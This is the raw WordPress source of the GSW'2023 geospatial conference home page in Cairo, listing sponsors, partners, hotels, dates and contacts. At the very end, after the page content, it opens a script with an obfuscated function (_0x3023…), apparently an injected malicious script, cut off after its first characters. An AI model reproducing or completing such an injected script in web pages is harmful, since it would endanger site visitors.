src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const 